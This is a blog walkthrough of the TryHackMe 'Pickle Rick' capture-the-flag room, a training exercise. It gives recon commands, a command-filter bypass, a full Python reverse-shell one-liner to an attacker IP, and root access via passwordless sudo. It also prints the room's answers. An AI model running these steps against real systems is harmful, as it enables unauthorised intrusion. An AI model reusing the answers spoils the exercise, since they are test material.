Notice
Recent Posts
Recent Comments
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
Archives
Today
Total
관리 메뉴

root@sky:~#

Pickle Rick | TryHackMe Walkthrough 본문

CTFs/TryHackMe

Pickle Rick | TryHackMe Walkthrough

Akash Kumar 2021. 12. 1. 05:03


 

 

 

 

 

 

 

 

This Rick and Morty-themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

 

Let's solve it :-)

Answer the questions below

Q.) What is the first ingredient Rick needs?

A.) mr. meeseek hair

Process:- First of all let's start the machine and do an nmap

nmap -sV 10.10.127.23

nmap result

Here, Port 80 and port 22 open. Let's visit port 80.

Apache webserver

Let's open the source code of this page. Maybe I could get any clues.

username in a HTML comment

Yup, I got a username. It may be an ssh username or there should be a login page.

Let's do gobuster,

gobuster dir -u http://10.10.127.23/ -w /usr/share/wordlists/dirb/common.txt

gobuster found some interesting directory like,

1) robot.txt (without any disallow)

2) login.php

 

In robot.txt I got a weird string: Wubbalubbadubdub

robot.txt

And in login.php I got a login page portal,

login.php

Now, I have a username "R1ckRul3s" and a weird string "Wubbalubbadubdub", It may be a password.

Let's try to login with this credential.

login

Yup, I got a command panel,

command panel

Let's run "ls" command

ls command output

Here, I got a clue.txt. It may be any clues.

Let's cat it,

Command disabled

Oops, It looks like this command is disabled!

I saw that some commands like cat, head, more, nano, are disabled.

Let's try through a basic command "echo". I am using this command -

while readline; do echo $line; done < clue.txt

clue.txt

Oops, It is a clue.

Let's read Sup3rS3cretPickl3Ingres.txt, It may be a fag. 

The first ingredient Rick needs

 


Q.) What's the second ingredient Rick needs?

A.) 1 jerry tear

Process:- Now, we have a command executor web. Let's check if python is available:

which python3

which python3

Yup, python3 is installed. Now we can get a reverse shell through python.

First of all, let's start a ncat listener on port 2222. Running this command in my kali terminal-

nc -lvnp 2222

nc -lvnp 2222

Now, I gonna use this python code on the command panel web to get a reverse shell -

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.170.30 ",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

python3 reverse shell

After executing this command I got a shell -

nc received a connection

But it's an unstable shell, to make it stable I am using a python script -

python3 -c 'import pty;pty.spawn("/bin/bash")'

Yup, I got a web stable shell,

a stable shell

By running the " sudo -l " command I got important info, that www-data user can run any command as root without password,

sudo -l

Now, I used " sudo su " and got a root shell.

I got the second ingredient in the rick user directory,

cat /home/rick/ *

 


Q.) What's the final ingredient Rick needs?

A.) fleeb juice

Process:- I got the final ingredient in the root directory,

cd
cat 3rd.txt

 

 

Thanks for reading :-)

plz leave a comment and like.

Comments